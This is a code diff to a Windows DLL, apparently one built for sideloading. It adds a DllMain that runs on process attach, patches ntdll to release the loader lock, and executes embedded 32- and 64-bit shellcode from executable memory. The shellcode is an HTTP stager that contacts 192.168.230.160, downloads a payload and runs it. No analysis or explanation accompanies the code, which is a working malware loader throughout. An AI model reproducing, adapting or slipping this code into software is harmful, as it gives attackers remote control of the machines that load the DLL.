2 | 2 | | |
3 | 3 | | #include "export.hpp" |
4 | 4 | | |
5 | | - | BOOL APIENTRY DllMain( HMODULE hModule, |
6 | | - | DWORD ul_reason_for_call, |
7 | | - | LPVOID lpReserved |
8 | | - | ) |
| 5 | + | void runShellcode() { |
| 6 | + | #ifdef _WIN64 |
| 7 | + | unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x77\x62\x33\x51\x00\xbe\x54\x9b\xd2\x7c\xfa\x60\x3e\xf5\x66\xf0\x09\xea\x24\x0f\xba\x3f\x08\x24\xf9\x38\x21\xe0\x96\x96\xd8\x89\x1e\x48\x7c\xa1\xf9\xd9\xcc\x90\x0e\x6f\xd5\x45\x57\x5b\xfb\xdb\xa3\x70\x03\xb0\xee\xeb\xd9\x79\x98\x45\x23\xba\x64\x8a\x94\x74\x50\x18\xdc\xc1\x2b\x20\x0d\x12\x0d\xe7\xa8\x97\x83\x2e\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2
e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x30\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x6d\x73\x6e\x20\x4f\x70\x74\x69\x6d\x69\x7a\x65\x64\x49\x45\x38\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x71\xd2\x43\x20\x55\x08\xd3\x23\x34\xfc\xd2\xd1\xe2\x4f\xec\x22\x44\xc6\x9d\x09\xba\x8b\x26\x94\x39\xfb\xac\x61\xc8\xf8\x04\x70\x46\x24\xda\xb4\x08\x0b\xd2\x41\x5d\x26\xc9\x5c\xdf\xd3\xb4\x5c\x4d\x3a\xa4\x8c\x02\x64\x8c\xfb\xc7\x13\xb4\xb6\xdc\x3a\xef\x24\x38\x22\xb2\x88\x05\xc4\x50\x26\x1d\xb5\x02\x11\x31\xdb\x03\xc1\xf4\xb5\xe7\x8b\x84\x82\xea\xca\xad\xd9\x1e\x3f\xe2\x56\x79\xc7\xd8\x45\x13\xd4\x68\x50\xf9\x5f\x73\x5b\xf2\xb3\x67\x66\xec\x43\xb7\x41\x14\x6b\x0c\xcc\x26\x23\x3f\x86\x3a\xc1\x36\x0e\x9e\x74\xb0\x54\x2b\x4f\xa4\x6f\x75\x9e\xb6\x0b\x57\xa9\xf1\x79\x49\x32\xe5\xf2\x0a\xa9\x6a\x0e\xbe\x15\xd1\x2e\x53\x8d\x29\x3e\xb5\x90\xda\x81\x9c\xfa\x2f\x4c\xd0\x2d\xae\xdb\x13\x1c\xbf\x79\x4a\x6f\x5a\xe9\x62\x4b\x75\xeb\x19\xc8\xb2\x1b\x94\x32\xcb\xab\x62\x24\xf0\x81\x8e\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x33\x30\x2e\x31\x36\x30\x00\x27\xbc\x86\xaa"; |
| 8 | + | #else |
| 9 | + | unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x33\x4c\x65\x78\x00\x1e\x2a\x49\x6f\x20\xa4\x24\x44\x23\xc5\x0f\xee\x14\x50\x02\xcd\x9c\x65\x33\xae\x94\xd0\x66\x47\x44\x06\xb2\x4a\xb6\xe0\xf8\x75\xb4\x21\x57\xb8\x8c\x10\xe5\xe3\x1e\xb6\xf6\xab\x3c\x72\xc6\x88\xcc\xe4\x82\xc9\x2d\xd8\x30\x70\x58\x93\x4b\x02\x38\xcb\xd0\x75\x60\x8e\xf7\x25\x37\x08\xcb\x29\x5e\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x29\x0d\x0a\x00\xfc\xc9\x44\x0c\xbb\x1e\x52\x72\x6f\x37\xf0\x38\x19\x4f\x76\x23\xef\xcc\x2d\xb2\xed\x0c\x1f\x6
b\xc4\xa3\xe3\x1d\x5b\x72\xcc\x44\x57\xbc\x26\x36\x37\x7b\xae\x4b\x30\xed\x07\x07\x0b\x96\xe7\xfe\xbf\xac\x68\xe6\xb5\x4b\x99\x53\x7e\x3f\x9e\x92\x53\xcf\x77\x90\x85\x62\xe5\x36\x90\xe8\x42\xb6\x1b\xee\xed\x22\x81\xb5\x68\x31\x09\xdf\x74\x72\x56\xbb\xb7\xd0\x24\x26\x2c\xd1\x81\x72\x07\x90\xb6\x34\x55\xcc\x78\xd8\x61\x2c\xb5\x70\x50\x08\xb9\xd4\x3a\x89\xbf\xd2\x34\xee\x02\x5d\xf5\xe8\xf8\xd6\x2a\x96\x19\x8a\x7e\x14\x1a\x4e\xbd\x58\xf2\x5c\x6e\xd5\x7e\x08\x1b\x1f\x3d\xd9\xde\xf5\xee\x4e\x80\x1f\xa7\x97\x31\x0c\x34\x6a\xa2\x09\x20\xad\x34\x66\xc4\x6d\x81\x84\x68\x93\x6a\x8c\xc4\xee\xb7\x52\x11\xa0\xb4\x74\xd8\x21\x86\xb8\x4e\x0c\x94\x85\x60\x24\x0a\x67\x20\x8d\x59\x18\x24\x82\xb1\x00\x58\x28\xd0\x78\x15\x35\x4b\x86\x76\x0b\x68\x04\x4b\xf3\xb2\xce\x1f\x0a\x6d\x23\x63\x90\x5e\x10\x14\xab\x67\xe4\x36\x25\xe8\xe6\xc9\x8e\xeb\x22\xfb\x1c\x4d\x9c\x17\x9e\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x33\x30\x2e\x31\x36\x30\x00\x27\xbc\x86\xaa"; |
| 10 | + | #endif |
| 11 | + | |
| 12 | + | LPVOID shellcode = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, 0x40); |
| 13 | + | |
| 14 | + | memcpy(shellcode, buf, sizeof(buf)); |
| 15 | + | |
| 16 | + | void(*func)(); |
| 17 | + | func = (void(*)())shellcode; |
| 18 | + | func(); |
| 19 | + | } |
| 20 | + | |
| 21 | + | typedef struct _LSA_UNICODE_STRING { |
| 22 | + | USHORT Length; |
| 23 | + | USHORT MaximumLength; |
| 24 | + | PWSTR Buffer; |
| 25 | + | } LSA_UNICODE_STRING, * PLSA_UNICODE_STRING, UNICODE_STRING, * PUNICODE_STRING; |
| 26 | + | typedef struct _STRING { |
| 27 | + | USHORT Length; |
| 28 | + | USHORT MaximumLength; |
| 29 | + | PCHAR Buffer; |
| 30 | + | } ANSI_STRING, * PANSI_STRING; |
| 31 | + | |
| 32 | + | typedef struct _PEB_LDR_DATA { |
| 33 | + | ULONG Length; |
| 34 | + | ULONG Initialized; |
| 35 | + | PVOID SsHandle; |
| 36 | + | LIST_ENTRY InLoadOrderModuleList; |
| 37 | + | LIST_ENTRY InMemoryOrderModuleList; |
| 38 | + | LIST_ENTRY InInitializationOrderModuleList; |
| 39 | + | } PEB_LDR_DATA, * PPEB_LDR_DATA; |
| 40 | + | typedef struct _CURDIR { |
| 41 | + | UNICODE_STRING DosPath; |
| 42 | + | PVOID Handle; |
| 43 | + | }CURDIR, * PCURDIR; |
| 44 | + | typedef struct _RTL_DRIVE_LETTER_CURDIR { |
| 45 | + | WORD Flags; |
| 46 | + | WORD Length; |
| 47 | + | ULONG TimeStamp; |
| 48 | + | ANSI_STRING DosPath; |
| 49 | + | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; |
| 50 | + | |
| 51 | + | typedef struct _RTL_USER_PROCESS_PARAMETERS { |
| 52 | + | ULONG MaximumLength; |
| 53 | + | ULONG Length; |
| 54 | + | ULONG Flags; |
| 55 | + | ULONG DebugFlags; |
| 56 | + | PVOID ConsoleHandle; |
| 57 | + | ULONG ConsoleFlags; |
| 58 | + | PVOID StandardInput; |
| 59 | + | PVOID StandardOutput; |
| 60 | + | PVOID StandardError; |
| 61 | + | CURDIR CurrentDirectory; |
| 62 | + | UNICODE_STRING DllPath; |
| 63 | + | UNICODE_STRING ImagePathName; |
| 64 | + | UNICODE_STRING CommandLine; |
| 65 | + | PVOID Environment; |
| 66 | + | ULONG StartingX; |
| 67 | + | ULONG StartingY; |
| 68 | + | ULONG CountX; |
| 69 | + | ULONG CountY; |
| 70 | + | ULONG CountCharsX; |
| 71 | + | ULONG CountCharsY; |
| 72 | + | ULONG FillAttribute; |
| 73 | + | ULONG WindowFlags; |
| 74 | + | ULONG ShowWindowFlags; |
| 75 | + | UNICODE_STRING WindowTitle; |
| 76 | + | UNICODE_STRING DesktopInfo; |
| 77 | + | UNICODE_STRING ShellInfo; |
| 78 | + | UNICODE_STRING RuntimeData; |
| 79 | + | RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32]; |
| 80 | + | ULONG EnvironmentSize; |
| 81 | + | }RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; |
| 82 | + | |
| 83 | + | typedef struct _PEB { |
| 84 | + | BOOLEAN InheritedAddressSpace; |
| 85 | + | BOOLEAN ReadImageFileExecOptions; |
| 86 | + | BOOLEAN BeingDebugged; |
| 87 | + | BOOLEAN Spare; |
| 88 | + | HANDLE Mutant; |
| 89 | + | PVOID ImageBase; |
| 90 | + | PPEB_LDR_DATA LoaderData; |
| 91 | + | PRTL_USER_PROCESS_PARAMETERS ProcessParameters; |
| 92 | + | PVOID SubSystemData; |
| 93 | + | PVOID ProcessHeap; |
| 94 | + | PVOID FastPebLock; |
| 95 | + | PVOID FastPebLockRoutine; |
| 96 | + | PVOID FastPebUnlockRoutine; |
| 97 | + | ULONG EnvironmentUpdateCount; |
| 98 | + | PVOID* KernelCallbackTable; |
| 99 | + | PVOID EventLogSection; |
| 100 | + | PVOID EventLog; |
| 101 | + | PVOID FreeList; |
| 102 | + | ULONG TlsExpansionCounter; |
| 103 | + | PVOID TlsBitmap; |
| 104 | + | ULONG TlsBitmapBits[0x2]; |
| 105 | + | PVOID ReadOnlySharedMemoryBase; |
| 106 | + | PVOID ReadOnlySharedMemoryHeap; |
| 107 | + | PVOID* ReadOnlyStaticServerData; |
| 108 | + | PVOID AnsiCodePageData; |
| 109 | + | PVOID OemCodePageData; |
| 110 | + | PVOID UnicodeCaseTableData; |
| 111 | + | ULONG NumberOfProcessors; |
| 112 | + | ULONG NtGlobalFlag; |
| 113 | + | BYTE Spare2[0x4]; |
| 114 | + | LARGE_INTEGER CriticalSectionTimeout; |
| 115 | + | ULONG HeapSegmentReserve; |
| 116 | + | ULONG HeapSegmentCommit; |
| 117 | + | ULONG HeapDeCommitTotalFreeThreshold; |
| 118 | + | ULONG HeapDeCommitFreeBlockThreshold; |
| 119 | + | ULONG NumberOfHeaps; |
| 120 | + | ULONG MaximumNumberOfHeaps; |
| 121 | + | PVOID** ProcessHeaps; |
| 122 | + | PVOID GdiSharedHandleTable; |
| 123 | + | PVOID ProcessStarterHelper; |
| 124 | + | PVOID GdiDCAttributeList; |
| 125 | + | PVOID LoaderLock; |
| 126 | + | ULONG OSMajorVersion; |
| 127 | + | ULONG OSMinorVersion; |
| 128 | + | ULONG OSBuildNumber; |
| 129 | + | ULONG OSPlatformId; |
| 130 | + | ULONG ImageSubSystem; |
| 131 | + | ULONG ImageSubSystemMajorVersion; |
| 132 | + | ULONG ImageSubSystemMinorVersion; |
| 133 | + | ULONG GdiHandleBuffer[0x22]; |
| 134 | + | ULONG PostProcessInitRoutine; |
| 135 | + | ULONG TlsExpansionBitmap; |
| 136 | + | BYTE TlsExpansionBitmapBits[0x80]; |
| 137 | + | ULONG SessionId; |
| 138 | + | } PEB, * PPEB; |
| 139 | + | |
| 140 | + | PPEB GetPeb(VOID) |
| 141 | + | { |
| 142 | + | #if defined(_WIN64) |
| 143 | + | return (PPEB)__readgsqword(0x60); |
| 144 | + | #elif defined(_WIN32) |
| 145 | + | return (PPEB)__readfsdword(0x30); |
| 146 | + | #endif |
| 147 | + | } |
| 148 | + | |
| 149 | + | size_t memFind(BYTE* mem, BYTE* search, size_t memSize, size_t length) |
| 150 | + | { |
| 151 | + | size_t end = length - 1; |
| 152 | + | size_t begin = 0; |
| 153 | + | BOOL tmp; |
| 154 | + | |
| 155 | + | if (memSize < size_t(mem)) { |
| 156 | + | //反向搜索 |
| 157 | + | for (size_t i = 0; size_t(mem) - i >= memSize; i++) |
| 158 | + | { |
| 159 | + | tmp = TRUE; |
| 160 | + | |
| 161 | + | while (begin <= end) |
| 162 | + | { |
| 163 | + | if ((search[begin] != 0xFF && *(mem - i + begin) != search[begin]) || (search[end] != 0xFF && *(mem - i + end) != search[end])) |
| 164 | + | { |
| 165 | + | tmp = FALSE; |
| 166 | + | break; |
| 167 | + | } |
| 168 | + | |
| 169 | + | begin++; |
| 170 | + | } |
| 171 | + | if (tmp) |
| 172 | + | return size_t(mem) - i; |
| 173 | + | else |
| 174 | + | begin = 0; |
| 175 | + | } |
| 176 | + | } |
| 177 | + | else { |
| 178 | + | for (size_t i = 0; i + size_t(mem) < memSize; i++) |
| 179 | + | { |
| 180 | + | tmp = TRUE; |
| 181 | + | |
| 182 | + | while (begin <= end) |
| 183 | + | { |
| 184 | + | if ((search[begin] != 0xFF && *(mem + i + begin) != search[begin]) || (search[end] != 0xFF && *(mem + i + end) != search[end])) |
| 185 | + | { |
| 186 | + | tmp = FALSE; |
| 187 | + | break; |
| 188 | + | } |
| 189 | + | |
| 190 | + | begin++; |
| 191 | + | } |
| 192 | + | if (tmp) |
| 193 | + | return size_t(mem) + i; |
| 194 | + | else |
| 195 | + | begin = 0; |
| 196 | + | } |
| 197 | + | } |
| 198 | + | |
| 199 | + | return 0; |
| 200 | + | } |
| 201 | + | |
| 202 | + | size_t GetSkipFileAPIBrokering(VOID) |
| 203 | + | { |
| 204 | + | #if defined(_WIN64) |
| 205 | + | return __readgsqword(0x30) + 0x17EE; |
| 206 | + | #elif defined(_WIN32) |
| 207 | + | return __readfsdword(0x18) + 0xFCA; |
| 208 | + | #endif |
| 209 | + | } |
| 210 | + | |
| 211 | + | #ifdef _WIN64 |
| 212 | + | unsigned char lock_count_flag[] = { 0x66, 0x21, 0x88, 0xEE, 0x17, 0x00, 0x00 }; |
| 213 | + | #else |
| 214 | + | unsigned char lock_count_flag[] = {0x66, 0x21, 0x88, 0xCA, 0x0F, 0x00, 0x00, 0xE8}; |
| 215 | + | #endif |
| 216 | + | |
| 217 | + | VOID UNLOOK() |
| 218 | + | { |
| 219 | + | HMODULE base = GetModuleHandleA("ntdll.dll"); |
| 220 | + | PIMAGE_DOS_HEADER pDH = (PIMAGE_DOS_HEADER)base; |
| 221 | + | DWORD size_of_img; |
| 222 | + | |
| 223 | + | if (*(PWORD)((size_t)pDH + pDH->e_lfanew + 0x18) == IMAGE_NT_OPTIONAL_HDR32_MAGIC){ |
| 224 | + | PIMAGE_NT_HEADERS32 pNtH32 = PIMAGE_NT_HEADERS32((size_t)pDH + pDH->e_lfanew); |
| 225 | + | PIMAGE_OPTIONAL_HEADER32 pOH32 = &pNtH32->OptionalHeader; |
| 226 | + | |
| 227 | + | size_of_img = pOH32->SizeOfImage; |
| 228 | + | } |
| 229 | + | else { |
| 230 | + | PIMAGE_NT_HEADERS64 pNtH64 = PIMAGE_NT_HEADERS64((size_t)pDH + pDH->e_lfanew); |
| 231 | + | PIMAGE_OPTIONAL_HEADER64 pOH64 = &pNtH64->OptionalHeader; |
| 232 | + | |
| 233 | + | size_of_img = pOH64->SizeOfImage; |
| 234 | + | } |
| 235 | + | |
| 236 | + | //适用于win7以上的系统,需要格外修改值 |
| 237 | + | size_t addr = memFind((BYTE*)base, lock_count_flag, (size_t)base + size_of_img, sizeof(lock_count_flag)); |
| 238 | + | Sleep(1); |
| 239 | + | if (addr != 0) |
| 240 | + | { |
| 241 | + | #ifdef _WIN64 |
| 242 | + | addr = (size_t)addr + 0x15; |
| 243 | + | addr = addr + 5 + *(PDWORD)addr; |
| 244 | + | *(PDWORD)addr = (*(PDWORD)addr) & 0; |
| 245 | + | #else |
| 246 | + | addr = (size_t)addr + 0xe; |
| 247 | + | addr = *(PDWORD)addr; |
| 248 | + | *(PDWORD)addr = (*(PDWORD)addr) & 0; |
| 249 | + | #endif |
| 250 | + | |
| 251 | + | size_t skipFileAPIBrokeringAddr = GetSkipFileAPIBrokering(); |
| 252 | + | (*(PWORD)skipFileAPIBrokeringAddr) = (*(PWORD)skipFileAPIBrokeringAddr) & 0xEFFF; |
| 253 | + | } |
| 254 | + | |
| 255 | + | PPEB Peb = GetPeb(); |
| 256 | + | HMODULE hModule = GetModuleHandleA("ntdll.dll"); |
| 257 | + | if (hModule == NULL) |
| 258 | + | return; |
| 259 | + | |
| 260 | + | typedef NTSTATUS(NTAPI* RTLLEAVECRITICALSECTION)(PRTL_CRITICAL_SECTION CriticalSection); |
| 261 | + | |
| 262 | + | RTLLEAVECRITICALSECTION RtlLeaveCriticalSection = NULL; |
| 263 | + | |
| 264 | + | RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)GetProcAddress((HMODULE)hModule, "RtlLeaveCriticalSection"); |
| 265 | + | |
| 266 | + | RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)Peb->LoaderLock); |
| 267 | + | } |
| 268 | + | |
| 269 | + | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) |
9 | 270 | | { |
10 | 271 | | switch (ul_reason_for_call) |
11 | 272 | | { |
12 | 273 | | case DLL_PROCESS_ATTACH: |
13 | | - | //exit(0x1D7F9D44); |
14 | | - | case DLL_THREAD_ATTACH: |
15 | | - | case DLL_THREAD_DETACH: |
16 | | - | case DLL_PROCESS_DETACH: |
17 | | - | break; |
| 274 | + | UNLOOK(); |
| 275 | + | |
| 276 | + | runShellcode(); |
18 | 277 | | } |
19 | 278 | | return TRUE; |
20 | 279 | | } |
21 | 280 | | |
22 | | - | |